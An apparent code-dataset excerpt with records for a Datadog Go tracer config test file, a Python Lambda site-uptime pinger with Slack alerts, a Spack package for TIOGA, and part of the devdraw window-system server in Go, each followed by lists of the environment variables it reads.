defer os.Unsetenv(traceprof.EndpointEnvVar)
c := newConfig()
assert.True(t, c.profilerEndpoints)
})
})
t.Run("profiler-hotspots", func(t *testing.T) {
t.Run("default", func(t *testing.T) {
c := newConfig()
assert.False(t, c.profilerHotspots)
})
t.Run("override", func(t *testing.T) {
os.Setenv(traceprof.CodeHotspotsEnvVar, "true")
defer os.Unsetenv(traceprof.CodeHotspotsEnvVar)
c := newConfig()
assert.True(t, c.profilerHotspots)
})
})
t.Run("env-mapping", func(t *testing.T) {
os.Setenv("DD_SERVICE_MAPPING", "tracer.test:test2, svc:Newsvc,http.router:myRouter, noval:")
defer os.Unsetenv("DD_SERVICE_MAPPING")
assert := assert.New(t)
c := newConfig()
assert.Equal("test2", c.serviceMappings["tracer.test"])
assert.Equal("Newsvc", c.serviceMappings["svc"])
assert.Equal("myRouter", c.serviceMappings["http.router"])
assert.Equal("", c.serviceMappings["noval"])
})
}
func TestDefaultHTTPClient(t *testing.T) {
t.Run("no-socket", func(t *testing.T) {
assert.Equal(t, defaultHTTPClient(), defaultClient)
})
t.Run("socket", func(t *testing.T) {
f, err := ioutil.TempFile("", "apm.socket")
if err != nil {
t.Fatal(err)
}
if err := f.Close(); err != nil {
t.Fatal(err)
}
defer os.RemoveAll(f.Name())
defer func(old string) { defaultSocketAPM = old }(defaultSocketAPM)
defaultSocketAPM = f.Name()
assert.NotEqual(t, defaultHTTPClient(), defaultClient)
})
}
func TestDefaultDogstatsdAddr(t *testing.T) {
t.Run("no-socket", func(t *testing.T) {
assert.Equal(t, defaultDogstatsdAddr(), "localhost:8125")
})
t.Run("env", func(t *testing.T) {
defer func(old string) { os.Setenv("DD_DOGSTATSD_PORT", old) }(os.Getenv("DD_DOGSTATSD_PORT"))
os.Setenv("DD_DOGSTATSD_PORT", "8111")
assert.Equal(t, defaultDogstatsdAddr(), "localhost:8111")
})
t.Run("env+socket", func(t *testing.T) {
defer func(old string) { os.Setenv("DD_DOGSTATSD_PORT", old) }(os.Getenv("DD_DOGSTATSD_PORT"))
os.Setenv("DD_DOGSTATSD_PORT", "8111")
assert.Equal(t, defaultDogstatsdAddr(), "localhost:8111")
f, err := ioutil.TempFile("", "dsd.socket")
if err != nil {
t.Fatal(err)
}
if err := f.Close(); err != nil {
t.Fatal(err)
}
defer os.RemoveAll(f.Name())
defer func(old string) { defaultSocketDSD = old }(defaultSocketDSD)
defaultSocketDSD = f.Name()
assert.Equal(t, defaultDogstatsdAddr(), "localhost:8111")
})
t.Run("socket", func(t *testing.T) {
defer func(old string) { os.Setenv("DD_AGENT_HOST", old) }(os.Getenv("DD_AGENT_HOST"))
defer func(old string) { os.Setenv("DD_DOGSTATSD_PORT", old) }(os.Getenv("DD_DOGSTATSD_PORT"))
os.Unsetenv("DD_AGENT_HOST")
os.Unsetenv("DD_DOGSTATSD_PORT")
f, err := ioutil.TempFile("", "dsd.socket")
if err != nil {
t.Fatal(err)
}
if err := f.Close(); err != nil {
t.Fatal(err)
}
defer os.RemoveAll(f.Name())
defer func(old string) { defaultSocketDSD = old }(defaultSocketDSD)
defaultSocketDSD = f.Name()
assert.Equal(t, defaultDogstatsdAddr(), "unix://"+f.Name())
})
}
func TestServiceName(t *testing.T) {
t.Run("WithServiceName", func(t *testing.T) {
defer globalconfig.SetServiceName("")
assert := assert.New(t)
c := newConfig(
WithServiceName("api-intake"),
)
assert.Equal("api-intake", c.serviceName)
assert.Equal("", globalconfig.ServiceName())
})
t.Run("WithService", func(t *testing.T) {
defer globalconfig.SetServiceName("")
assert := assert.New(t)
c := newConfig(
WithService("api-intake"),
)
assert.Equal("api-intake", c.serviceName)
assert.Equal("api-intake", globalconfig.ServiceName())
})
t.Run("env", func(t *testing.T) {
defer globalconfig.SetServiceName("")
os.Setenv("DD_SERVICE", "api-intake")
defer os.Unsetenv("DD_SERVICE")
assert := assert.New(t)
c := newConfig()
assert.Equal("api-intake", c.serviceName)
assert.Equal("api-intake", globalconfig.ServiceName())
})
t.Run("WithGlobalTag", func(t *testing.T) {
defer globalconfig.SetServiceName("")
assert := assert.New(t)
c := newConfig(WithGlobalTag("service", "api-intake"))
assert.Equal("api-intake", c.serviceName)
assert.Equal("api-intake", globalconfig.ServiceName())
})
t.Run("DD_TAGS", func(t *testing.T) {
defer globalconfig.SetServiceName("")
os.Setenv("DD_TAGS", "service:api-intake")
defer os.Unsetenv("DD_TAGS")
assert := assert.New(t)
c := newConfig()
assert.Equal("api-intake", c.serviceName)
assert.Equal("api-intake", globalconfig.ServiceName())
})
t.Run("override-chain", func(t *testing.T) {
assert := assert.New(t)
globalconfig.SetServiceName("")
c := newConfig()
assert.Equal(c.serviceName, filepath.Base(os.Args[0]))
assert.Equal("", globalconfig.ServiceName())
os.Setenv("DD_TAGS", "service:testService")
defer os.Unsetenv("DD_TAGS")
globalconfig.SetServiceName("")
c = newConfig()
assert.Equal(c.serviceName, "testService")
assert.Equal("testService", globalconfig.ServiceName())
globalconfig.SetServiceName("")
c = newConfig(WithGlobalTag("service", "testService2"))
assert.Equal(c.serviceName, "testService2")
assert.Equal("testService2", globalconfig.ServiceName())
os.Setenv("DD_SERVICE", "testService3")
defer os.Unsetenv("DD_SERVICE")
globalconfig.SetServiceName("")
c = newConfig(WithGlobalTag("service", "testService2"))
assert.Equal(c.serviceName, "testService3")
assert.Equal("testService3", globalconfig.ServiceName())
globalconfig.SetServiceName("")
c = newConfig(WithGlobalTag("service", "testService2"), WithService("testService4"))
assert.Equal(c.serviceName, "testService4")
assert.Equal("testService4", globalconfig.ServiceName())
})
}
func TestTagSeparators(t *testing.T) {
assert := assert.New(t)
for _, tag := range []struct {
in string
out map[string]string
}{{
in: "env:test aKey:aVal bKey:bVal cKey:",
out: map[string]string{
"env": "test",
"aKey": "aVal",
"bKey": "bVal",
"cKey": "",
},
},
{
in: "env:test,aKey:aVal,bKey:bVal,cKey:",
out: map[string]string{
"env": "test",
"aKey": "aVal",
"bKey": "bVal",
"cKey": "",
},
},
{
in: "env:test,aKey:aVal bKey:bVal cKey:",
out: map[string]string{
"env": "test",
"aKey": "aVal bKey:bVal cKey:",
},
},
{
in: "env:test bKey :bVal dKey: dVal cKey:",
out: map[string]string{
"env": "test",
"bKey": "",
"dKey": "",
"dVal": "",
"cKey": "",
},
},
{
in: "env :test, aKey : aVal bKey:bVal cKey:",
out: map[string]string{
"env": "test",
"aKey": "aVal bKey:bVal cKey:",
},
},
{
in: "env:keyWithA:Semicolon bKey:bVal cKey",
out: map[string]string{
"env": "keyWithA:Semicolon",
"bKey": "bVal",
"cKey": "",
},
},
{
in: "env:keyWith: , , Lots:Of:Semicolons ",
out: map[string]string{
"env": "keyWith:",
"Lots": "Of:Semicolons",
},
},
{
in: "a:b,c,d",
out: map[string]string{
"a": "b",
"c": "",
"d": "",
},
},
{
in: "a,1",
out: map[string]string{
"a": "",
"1": "",
},
},
{
in: "a:b:c:d",
out: map[string]string{"a": "b:c:d"},
},
} {
t.Run("", func(t *testing.T) {
os.Setenv("DD_TAGS", tag.in)
defer os.Unsetenv("DD_TAGS")
c := newConfig()
for key, expected := range tag.out {
got, ok := c.globalTags[key]
assert.True(ok, "tag not found")
assert.Equal(expected, got)
}
})
}
}
func TestVersionConfig(t *testing.T) {
t.Run("WithServiceVersion", func(t *testing.T) {
assert := assert.New(t)
c := newConfig(
WithServiceVersion("1.2.3"),
)
assert.Equal("1.2.3", c.version)
})
t.Run("env", func(t *testing.T) {
os.Setenv("DD_VERSION", "1.2.3")
defer os.Unsetenv("DD_VERSION")
assert := assert.New(t)
c := newConfig()
assert.Equal("1.2.3", c.version)
})
t.Run("WithGlobalTag", func(t *testing.T) {
assert := assert.New(t)
c := newConfig(WithGlobalTag("version", "1.2.3"))
assert.Equal("1.2.3", c.version)
})
t.Run("DD_TAGS", func(t *testing.T) {
os.Setenv("DD_TAGS", "version:1.2.3")
defer os.Unsetenv("DD_TAGS")
assert := assert.New(t)
c := newConfig()
assert.Equal("1.2.3", c.version)
})
t.Run("override-chain", func(t *testing.T) {
assert := assert.New(t)
c := newConfig()
assert.Equal(c.version, "")
os.Setenv("DD_TAGS", "version:1.1.1")
defer os.Unsetenv("DD_TAGS")
c = newConfig()
assert.Equal("1.1.1", c.version)
c = newConfig(WithGlobalTag("version", "1.1.2"))
assert.Equal("1.1.2", c.version)
os.Setenv("DD_VERSION", "1.1.3")
defer os.Unsetenv("DD_VERSION")
c = newConfig(WithGlobalTag("version", "1.1.2"))
assert.Equal("1.1.3", c.version)
c = newConfig(WithGlobalTag("version", "1.1.2"), WithServiceVersion("1.1.4"))
assert.Equal("1.1.4", c.version)
})
}
func TestEnvConfig(t *testing.T) {
t.Run("WithEnv", func(t *testing.T) {
assert := assert.New(t)
c := newConfig(
WithEnv("testing"),
)
assert.Equal("testing", c.env)
})
t.Run("env", func(t *testing.T) {
os.Setenv("DD_ENV", "testing")
defer os.Unsetenv("DD_ENV")
assert := assert.New(t)
c := newConfig()
assert.Equal("testing", c.env)
})
t.Run("WithGlobalTag", func(t *testing.T) {
assert := assert.New(t)
c := newConfig(WithGlobalTag("env", "testing"))
assert.Equal("testing", c.env)
})
t.Run("DD_TAGS", func(t *testing.T) {
os.Setenv("DD_TAGS", "env:testing")
defer os.Unsetenv("DD_TAGS")
assert := assert.New(t)
c := newConfig()
assert.Equal("testing", c.env)
})
t.Run("override-chain", func(t *testing.T) {
assert := assert.New(t)
c := newConfig()
assert.Equal(c.env, "")
os.Setenv("DD_TAGS", "env:testing1")
defer os.Unsetenv("DD_TAGS")
c = newConfig()
assert.Equal("testing1", c.env)
c = newConfig(WithGlobalTag("env", "testing2"))
assert.Equal("testing2", c.env)
os.Setenv("DD_ENV", "testing3")
defer os.Unsetenv("DD_ENV")
c = newConfig(WithGlobalTag("env", "testing2"))
assert.Equal("testing3", c.env)
c = newConfig(WithGlobalTag("env", "testing2"), WithEnv("testing4"))
assert.Equal("testing4", c.env)
})
}
func TestStatsTags(t *testing.T) {
assert := assert.New(t)
c := newConfig(WithService("serviceName"), WithEnv("envName"))
c.hostname = "hostName"
tags := statsTags(c)
assert.Contains(tags, "service:serviceName")
assert.Contains(tags, "env:envName")
assert.Contains(tags, "host:hostName")
}
func TestGlobalTag(t *testing.T) {
var c config
WithGlobalTag("k", "v")(&c)
assert.Contains(t, statsTags(&c), "k:v")
}
func TestWithHostname(t *testing.T) {
t.Run("WithHostname", func(t *testing.T) {
assert := assert.New(t)
c := newConfig(WithHostname("hostname"))
assert.Equal("hostname", c.hostname)
})
t.Run("env", func(t *testing.T) {
assert := assert.New(t)
os.Setenv("DD_TRACE_SOURCE_HOSTNAME", "hostname-env")
defer os.Unsetenv("DD_TRACE_SOURCE_HOSTNAME")
c := newConfig()
assert.Equal("hostname-env", c.hostname)
})
t.Run("env-override", func(t *testing.T) {
assert := assert.New(t)
os.Setenv("DD_TRACE_SOURCE_HOSTNAME", "hostname-env")
defer os.Unsetenv("DD_TRACE_SOURCE_HOSTNAME")
c := newConfig(WithHostname("hostname-middleware"))
assert.Equal("hostname-middleware", c.hostname)
})
}
func TestWithTraceEnabled(t *testing.T) {
t.Run("WithTraceEnabled", func(t *testing.T) {
assert := assert.New(t)
c := newConfig(WithTraceEnabled(false))
assert.False(c.enabled)
})
t.Run("env", func(t *testing.T) {
assert := assert.New(t)
os.Setenv("DD_TRACE_ENABLED", "false")
defer os.Unsetenv("DD_TRACE_ENABLED")
c := newConfig()
assert.False(c.enabled)
})
t.Run("env-override", func(t *testing.T) {
assert := assert.New(t)
os.Setenv("DD_TRACE_ENABLED", "false")
defer os.Unsetenv("DD_TRACE_ENABLED")
c := newConfig(WithTraceEnabled(true))
assert.True(c.enabled)
})
}
func TestWithLogStartup(t *testing.T) {
c := newConfig()
assert.True(t, c.logStartup)
WithLogStartup(false)(c)
assert.False(t, c.logStartup)
WithLogStartup(true)(c)
assert.True(t, c.logStartup)
}
|
[
"\"DD_DOGSTATSD_PORT\"",
"\"DD_TRACE_FEATURES\"",
"\"DD_DOGSTATSD_PORT\"",
"\"DD_DOGSTATSD_PORT\"",
"\"DD_AGENT_HOST\"",
"\"DD_DOGSTATSD_PORT\""
] |
[] |
[
"DD_TRACE_FEATURES",
"DD_AGENT_HOST",
"DD_DOGSTATSD_PORT"
] |
[]
|
["DD_TRACE_FEATURES", "DD_AGENT_HOST", "DD_DOGSTATSD_PORT"]
|
go
| 3 | 0 | |
ping/ping.py
|
import boto3
import requests
import os
import json
import random
import datetime
#import traceback
import re
import urllib3
from requests import RequestException
from datetime import datetime
# Disable InsecureRequestWarning
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Environment Variables
SLACK_HOOK_URL = os.environ['SLACK_HOOK_URL']
TABLE_NAME = os.environ['TABLE_NAME']
LOG_TABLE_NAME = os.environ['LOG_TABLE_NAME']
QUEUE_NAME = os.environ['QUEUE_NAME']
# Run Domain for Status Code
def lambda_handler(event, context):
for record in event['Records']:
data = json.loads(record['body'])
handle_data(data)
return ""
def handle_data(data):
site_name = data["site_name"]
attempt_num = data['attempt_num']
site_url = site_name
# Determine Website Status
http_status_code = ping(site_url)
print(site_name + " status: " + http_status_code)
if attempt_num > 2:
if site_is_down(http_status_code):
actual_status = "down"
db_results = check_db(site_name, actual_status, http_status_code, site_url)
else:
if site_is_down(http_status_code):
# Send A Retry Message to SQS
attempt_num = attempt_num + 1
add_to_queue(site_name, attempt_num)
else:
actual_status = "up"
db_results = check_db(site_name, actual_status, http_status_code, site_url)
return ""
def site_is_down(http_status_code):
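# 2xx/3xx/4xx responses count as up; 5xx codes and request exceptions
# (whose string starts with the exception name) count as down.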
return http_status_code[0] not in ['2','3','4']
# Function to Get HTTP Status Code
def ping(site_url):
# Generate URL with Semi-Random Parameter to Bypass Cache
url = site_url.strip() + "?" + str(random.randint(100000, 999999))
url = re.sub(r'^https?://','', url)
url = "http://" + url
try:
r = requests.get(url, headers={"User-Agent": "demeter"}, timeout=20, verify=False)
http_status_code = str(r.status_code)
except RequestException as e:
#traceback.print_exc()
exception_type = type(e).__name__
http_status_code = exception_type + ": " + str(e)
return http_status_code
def send_slack_message(message):
print("sending message to slack:")
# Send Notification to Slack
try:
r = requests.post(url=SLACK_HOOK_URL, data=json.dumps(message), headers={'Content-Type' : 'application/json'}, timeout=10)
result = r.text
except RequestException as e:
#traceback.print_exc()
exception_type = type(e).__name__
result = exception_type + ": " + str(e)
return result
# Function to add another Message to Queue
def add_to_queue(site_name, attempt_num):
variables = {'site_name': site_name, 'attempt_num': attempt_num}
sqs = boto3.resource('sqs')
queue = sqs.get_queue_by_name(QueueName=QUEUE_NAME)
response = queue.send_message(MessageBody=json.dumps(variables), DelaySeconds=10)
# Function to check the current recorded status of the site and determine if
# a slack message needs to be sent and then to update the database accordingly
def check_db(site_name, actual_status, http_status_code, site_url):
dynamodb1 = boto3.resource('dynamodb').Table(TABLE_NAME)
dynamodb2 = boto3.resource('dynamodb').Table(LOG_TABLE_NAME)
response = dynamodb1.get_item(TableName=TABLE_NAME, Key={'site_name': site_name})
print(response)
try:
db_site_status = response.get('Item').get('site_status')
except:
creation_response = dynamodb1.update_item(TableName=TABLE_NAME,Key={'site_name':site_name},UpdateExpression='SET site_status = :values',ExpressionAttributeValues={':values': 'up'})
attempt_num = 0
add_to_queue(site_name, attempt_num)
else:
print("Database Status: " + db_site_status)
print("Actual Status: " + actual_status)
if db_site_status != actual_status:
timestamp = datetime.now().timestamp()
if actual_status == "up":
up_timestamp = int(timestamp)
down_timestamp = response.get('Item').get('down_timestamp')
site_key = response.get('Item').get('site_key')
time_diff = up_timestamp - down_timestamp
outage_time = convert_time(time_diff)
text = "<!here> " + site_name + " - STATUS: UP - OUTAGE TIME: " + outage_time + " - URL: " + site_url
# Send Slack Message
message = {"attachments": [{"text": text,"color": "#22bb33"}]}
result = send_slack_message(message)
# Log to Demeter Site Status Table
db_response = dynamodb1.update_item(TableName=TABLE_NAME,Key={'site_name':site_name},UpdateExpression='SET site_status = :value1, up_timestamp = :value2',ExpressionAttributeValues={':value1': 'up', ':value2': up_timestamp})
# Log to Demeter Downtime Log Table
db_log_response = dynamodb2.update_item(TableName=LOG_TABLE_NAME,Key={'site_key':site_key},UpdateExpression='SET up_timestamp = :value1, outage_time = :value2',ExpressionAttributeValues={':value1': up_timestamp, ':value2': outage_time})
print(db_response)
print(db_log_response)
elif actual_status == "down":
text = "<!here> " + site_name + " - STATUS: DOWN - STATUS CODE: " + http_status_code + " - URL: " + site_url
message = {"attachments": [{"text": text,"color": "bb2124"}]}
result = send_slack_message(message)
down_timestamp = int(timestamp)
site_key = site_name + '-' + str(down_timestamp)
# Log to Demeter Site Status Table
db_response = dynamodb1.update_item(TableName=TABLE_NAME,Key={'site_name':site_name},UpdateExpression='SET site_status = :value1, site_key = :value2, down_timestamp = :value3',ExpressionAttributeValues={':value1': 'down', ':value2': site_key, ':value3': down_timestamp})
# Log to Demeter Downtime Log Table
db_log_response = dynamodb2.update_item(TableName=LOG_TABLE_NAME,Key={'site_key':site_key},UpdateExpression='SET status_code = :value1, down_timestamp = :value2',ExpressionAttributeValues={':value1': http_status_code, ':value2': down_timestamp})
print("LOG ERRORS: " + site_name + " IS DOWN - SITE_KEY IS " + site_key)
print(db_response)
print(db_log_response)
def convert_time(seconds):
minutes, sec = divmod(seconds, 60)
hour, minutes = divmod(minutes, 60)
return "%d Hours %02d Minutes %02d Seconds " % (hour, minutes, sec)
|
[] |
[] |
[
"TABLE_NAME",
"SLACK_HOOK_URL",
"QUEUE_NAME",
"LOG_TABLE_NAME"
] |
[]
|
["TABLE_NAME", "SLACK_HOOK_URL", "QUEUE_NAME", "LOG_TABLE_NAME"]
|
python
| 4 | 0 | |
etc/repos/exawind/packages/tioga/package.py
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import sys
import os
from spack import *
class Tioga(CMakePackage, CudaPackage):
"""Topology Independent Overset Grid Assembly (TIOGA)"""
homepage = "https://github.com/jsitaraman/tioga"
git = "https://github.com/jsitaraman/tioga.git"
maintainers = ['jsitaraman', 'sayerhs']
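# Use the Ninja generator when EXAWIND_MAKE_TYPE=ninja is set in the environment;
# otherwise default to Unix Makefiles.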
generator = ('Ninja'
if os.environ.get('EXAWIND_MAKE_TYPE','').lower() == 'ninja'
else 'Unix Makefiles')
version('develop', branch='exawind')
version('master', branch='master')
variant('shared', default=sys.platform != 'darwin',
description="Build shared libraries")
variant('pic', default=True,
description="Enable position independent code")
variant('nodegid', default=True,
description="Enable support for global Node IDs")
variant('timers', default=False,
description="Enable timers")
variant('stats', default=False,
description="Enable output of holecut stats")
variant('cxxstd', default='11',
values=('11', '14'), multi=False,
description="C++ standard to use")
depends_on('ninja-fortran',
type='build',
when=(generator == 'Ninja'))
depends_on('mpi')
depends_on('[email protected]:', when='+cuda')
def cmake_args(self):
args = [
self.define_from_variant('BUILD_SHARED_LIBS', 'shared'),
self.define_from_variant('CMAKE_POSITION_INDEPENDENT_CODE', 'pic'),
self.define_from_variant('CMAKE_CXX_STANDARD', 'cxxstd'),
self.define_from_variant('TIOGA_HAS_NODEGID', 'nodegid'),
self.define_from_variant('TIOGA_ENABLE_TIMERS', 'timers'),
self.define_from_variant('TIOGA_OUTPUT_STATS', 'stats'),
self.define_from_variant('TIOGA_ENABLE_CUDA', 'cuda'),
]
if '+cuda' in self.spec:
args.append(self.define('CMAKE_CUDA_SEPARABLE_COMPILATION', True))
# Currently TIOGA only supports one device arch during specialization
cuda_arch = self.spec.variants['cuda_arch'].value
if cuda_arch:
arch_sorted = list(sorted(cuda_arch, reverse=True))
args.append(self.define('TIOGA_CUDA_SM', arch_sorted[0]))
if 'darwin' in self.spec.architecture:
args.append(self.define('CMAKE_MACOSX_RPATH', True))
return args
|
[] |
[] |
[
"EXAWIND_MAKE_TYPE"
] |
[]
|
["EXAWIND_MAKE_TYPE"]
|
python
| 1 | 0 | |
cmd/devdraw/srv.go
|
/*
* Window system protocol server.
*/
package main
import (
"flag"
"fmt"
"io"
"log"
"os"
"strconv"
"time"
"9fans.net/go/draw"
"9fans.net/go/draw/drawfcall"
"9fans.net/go/draw/memdraw"
)
var client0 *Client
var trace int = 0
var srvname string
var afd int
var adir string
func usage() {
fmt.Fprintf(os.Stderr, "usage: devdraw (don't run directly)\n")
os.Exit(2)
}
func main() {
log.SetPrefix("devdraw: ")
log.SetFlags(0)
flag.BoolVar(new(bool), "D", false, "ignored")
flag.BoolVar(new(bool), "f", false, "ignored")
flag.BoolVar(new(bool), "g", false, "ignored")
flag.BoolVar(new(bool), "b", false, "ignored")
flag.StringVar(&srvname, "s", srvname, "service name")
flag.Usage = usage
flag.Parse()
memdraw.Init()
p := os.Getenv("DEVDRAWTRACE")
if p != "" {
trace, _ = strconv.Atoi(p)
}
if srvname == "" {
client0 = new(Client)
client0.displaydpi = 100
/*
* Move the protocol off stdin/stdout so that
* any inadvertent prints don't screw things up.
*/
client0.rfd = os.Stdin
client0.wfd = os.Stdout
os.Stdin, _ = os.Open("/dev/null")
os.Stdout, _ = os.Create("/dev/null")
}
gfx_main()
}
func gfx_started() {
if srvname == "" {
// Legacy mode: serving single client on pipes.
go serveproc(client0)
return
}
panic("server mode")
/*
// Server mode.
ns := getns()
if ns == nil {
sysfatal("out of memory")
}
addr := fmt.Sprintf("unix!%s/%s", ns, srvname)
free(ns)
if addr == nil {
sysfatal("out of memory")
}
afd = announce(addr, adir)
if afd < 0 {
sysfatal("announce %s: %r", addr)
}
go listenproc()
*/
}
/*
func listenproc() {
for {
var dir string
fd := listen(adir, dir)
if fd < 0 {
sysfatal("listen: %r")
}
c := new(Client)
if c == nil {
fmt.Fprintf(os.Stderr, "initdraw: allocating client0: out of memory")
abort()
}
c.displaydpi = 100
c.rfd = fd
c.wfd = fd
go serveproc(c)
}
}
*/
func serveproc(c *Client) {
for {
b, err := drawfcall.ReadMsg(c.rfd)
if err != nil {
if err != io.EOF {
fmt.Fprintf(os.Stderr, "serveproc: cannot read message: %v\n", err)
}
break
}
var m drawfcall.Msg
if err := m.Unmarshal(b); err != nil {
fmt.Fprintf(os.Stderr, "serveproc: cannot convert message: %v\n", err)
break
}
if trace != 0 {
log.Printf("%v <- %v\n", time.Now().UnixNano()/1000000, &m)
}
runmsg(c, &m)
}
if c == client0 {
rpc_shutdown()
os.Exit(0)
}
}
func replyerror(c *Client, m *drawfcall.Msg, err error) {
m.Type = drawfcall.Rerror
m.Error = err.Error()
replymsg(c, m)
}
/*
* Handle a single wsysmsg.
* Might queue for later (kbd, mouse read)
*/
var runmsg_buf [65536]byte
func runmsg(c *Client, m *drawfcall.Msg) {
switch m.Type {
case drawfcall.Tctxt:
c.wsysid = m.ID
replymsg(c, m)
case drawfcall.Tinit:
i, err := rpc_attach(c, m.Label, m.Winsize)
if err != nil {
replyerror(c, m, err)
break
}
// println("I", i)
draw_initdisplaymemimage(c, i)
replymsg(c, m)
case drawfcall.Trdmouse:
c.eventlk.Lock()
if (c.mousetags.wi+1)%len(c.mousetags.t) == c.mousetags.ri {
c.eventlk.Unlock()
replyerror(c, m, fmt.Errorf("too many queued mouse reads"))
break
}
c.mousetags.t[c.mousetags.wi] = int(m.Tag)
c.mousetags.wi++
if c.mousetags.wi == len(c.mousetags.t) {
c.mousetags.wi = 0
}
c.mouse.stall = 0
matchmouse(c)
c.eventlk.Unlock()
case drawfcall.Trdkbd, drawfcall.Trdkbd4:
c.eventlk.Lock()
if (c.kbdtags.wi+1)%len(c.kbdtags.t) == c.kbdtags.ri {
c.eventlk.Unlock()
replyerror(c, m, fmt.Errorf("too many queued keyboard reads"))
break
}
ext := 0
if m.Type == drawfcall.Trdkbd4 {
ext = 1
}
c.kbdtags.t[c.kbdtags.wi] = int(m.Tag)<<1 | ext
c.kbdtags.wi++
if c.kbdtags.wi == len(c.kbdtags.t) {
c.kbdtags.wi = 0
}
c.kbd.stall = 0
matchkbd(c)
c.eventlk.Unlock()
case drawfcall.Tmoveto:
c.impl.rpc_setmouse(c, m.Mouse.Point)
replymsg(c, m)
case drawfcall.Tcursor:
if m.Arrow {
c.impl.rpc_setcursor(c, nil, nil)
} else {
cur := (*draw.Cursor)(&m.Cursor)
cur2 := (*draw.Cursor2)(&m.Cursor2)
*cur2 = draw.ScaleCursor(*cur)
c.impl.rpc_setcursor(c, cur, cur2)
}
replymsg(c, m)
case drawfcall.Tcursor2:
if m.Arrow {
c.impl.rpc_setcursor(c, nil, nil)
} else {
c.impl.rpc_setcursor(c, (*draw.Cursor)(&m.Cursor), (*draw.Cursor2)(&m.Cursor2))
}
replymsg(c, m)
case drawfcall.Tbouncemouse:
c.impl.rpc_bouncemouse(c, draw.Mouse(m.Mouse))
replymsg(c, m)
case drawfcall.Tlabel:
c.impl.rpc_setlabel(c, m.Label)
replymsg(c, m)
case drawfcall.Trdsnarf:
m.Snarf = rpc_getsnarf()
replymsg(c, m)
m.Snarf = nil
case drawfcall.Twrsnarf:
rpc_putsnarf(m.Snarf)
replymsg(c, m)
case drawfcall.Trddraw:
n := m.Count
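// Clamp the requested read size to the shared scratch buffer.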
if n > len(runmsg_buf) {
n = len(runmsg_buf)
}
n, err := draw_dataread(c, runmsg_buf[:n])
if err != nil {
replyerror(c, m, err)
} else {
m.Count = n
m.Data = runmsg_buf[:n]
replymsg(c, m)
}
case drawfcall.Twrdraw:
if _, err := draw_datawrite(c, m.Data); err != nil {
replyerror(c, m, err)
} else {
m.Count = len(m.Data)
replymsg(c, m)
}
case drawfcall.Ttop:
c.impl.rpc_topwin(c)
replymsg(c, m)
case drawfcall.Tresize:
c.impl.rpc_resizewindow(c, m.Rect)
replymsg(c, m)
}
}
/*
* drawfcall.Reply to m.
*/
func replymsg(c *Client, m *drawfcall.Msg) {
/* T -> R msg */
if m.Type%2 == 0 {
m.Type++
}
if trace != 0 {
fmt.Fprintf(os.Stderr, "%d -> %v\n", time.Now().UnixNano()/1000000, m)
}
c.wfdlk.Lock()
if _, err := c.wfd.Write(m.Marshal()); err != nil {
fmt.Fprintf(os.Stderr, "client write: %v\n", err)
}
c.wfdlk.Unlock()
}
/*
* Match queued kbd reads with queued kbd characters.
*/
func matchkbd(c *Client) {
if c.kbd.stall != 0 {
return
}
for c.kbd.ri != c.kbd.wi && c.kbdtags.ri != c.kbdtags.wi {
tag := c.kbdtags.t[c.kbdtags.ri]
c.kbdtags.ri++
var m drawfcall.Msg
m.Type = drawfcall.Rrdkbd
if tag&1 != 0 {
m.Type = drawfcall.Rrdkbd4
}
m.Tag = uint8(tag >> 1)
if c.kbdtags.ri == len(c.kbdtags.t) {
c.kbdtags.ri = 0
}
m.Rune = c.kbd.r[c.kbd.ri]
c.kbd.ri++
if c.kbd.ri == len(c.kbd.r) {
c.kbd.ri = 0
}
replymsg(c, &m)
}
}
// matchmouse matches queued mouse reads with queued mouse events.
// It must be called with c->eventlk held.
func matchmouse(c *Client) {
for c.mouse.ri != c.mouse.wi && c.mousetags.ri != c.mousetags.wi {
var m drawfcall.Msg
m.Type = drawfcall.Rrdmouse
m.Tag = uint8(c.mousetags.t[c.mousetags.ri])
c.mousetags.ri++
if c.mousetags.ri == len(c.mousetags.t) {
c.mousetags.ri = 0
}
m.Mouse = drawfcall.Mouse(c.mouse.m[c.mouse.ri])
m.Resized = c.mouse.resized
c.mouse.resized = false
/*
if(m.resized)
fmt.Fprintf(os.Stderr, "sending resize\n");
*/
c.mouse.ri++
if c.mouse.ri == len(c.mouse.m) {
c.mouse.ri = 0
}
replymsg(c, &m)
}
}
func gfx_mouseresized(c *Client) {
gfx_mousetrack(c, -1, -1, -1, ^uint32(0))
}
func gfx_mousetrack(c *Client, x int, y int, b int, ms uint32) {
c.eventlk.Lock()
if x == -1 && y == -1 && b == -1 && ms == ^uint32(0) {
var copy *draw.Mouse
// repeat last mouse event for resize
if c.mouse.ri == 0 {
copy = &c.mouse.m[len(c.mouse.m)-1]
} else {
copy = &c.mouse.m[c.mouse.ri-1]
}
x = copy.Point.X
y = copy.Point.Y
b = copy.Buttons
ms = copy.Msec
c.mouse.resized = true
}
if x < c.mouserect.Min.X {
x = c.mouserect.Min.X
}
if x > c.mouserect.Max.X {
x = c.mouserect.Max.X
}
if y < c.mouserect.Min.Y {
y = c.mouserect.Min.Y
}
if y > c.mouserect.Max.Y {
y = c.mouserect.Max.Y
}
// If reader has stopped reading, don't bother.
// If reader is completely caught up, definitely queue.
// Otherwise, queue only button change events.
if c.mouse.stall == 0 {
if c.mouse.wi == c.mouse.ri || c.mouse.last.Buttons != b {
m := &c.mouse.last
m.Point.X = x
m.Point.Y = y
m.Buttons = b
m.Msec = ms
c.mouse.m[c.mouse.wi] = *m
c.mouse.wi++
if c.mouse.wi == len(c.mouse.m) {
c.mouse.wi = 0
}
if c.mouse.wi == c.mouse.ri {
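// The ring buffer just overflowed: stall the stream and keep only the newest event.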
c.mouse.stall = 1
c.mouse.ri = 0
c.mouse.wi = 1
c.mouse.m[0] = *m
}
matchmouse(c)
}
}
c.eventlk.Unlock()
}
// kputc adds ch to the keyboard buffer.
// It must be called with c->eventlk held.
func kputc(c *Client, ch rune) {
c.kbd.r[c.kbd.wi] = ch
c.kbd.wi++
if c.kbd.wi == len(c.kbd.r) {
c.kbd.wi = 0
}
if c.kbd.ri == c.kbd.wi {
c.kbd.stall = 1
}
matchkbd(c)
}
// gfx_abortcompose stops any pending compose sequence,
// because a mouse button has been clicked.
// It is called from the graphics thread with no locks held.
func gfx_abortcompose(c *Client) {
c.eventlk.Lock()
if c.kbd.alting {
c.kbd.alting = false
c.kbd.nk = 0
}
c.eventlk.Unlock()
}
// gfx_keystroke records a single-rune keystroke.
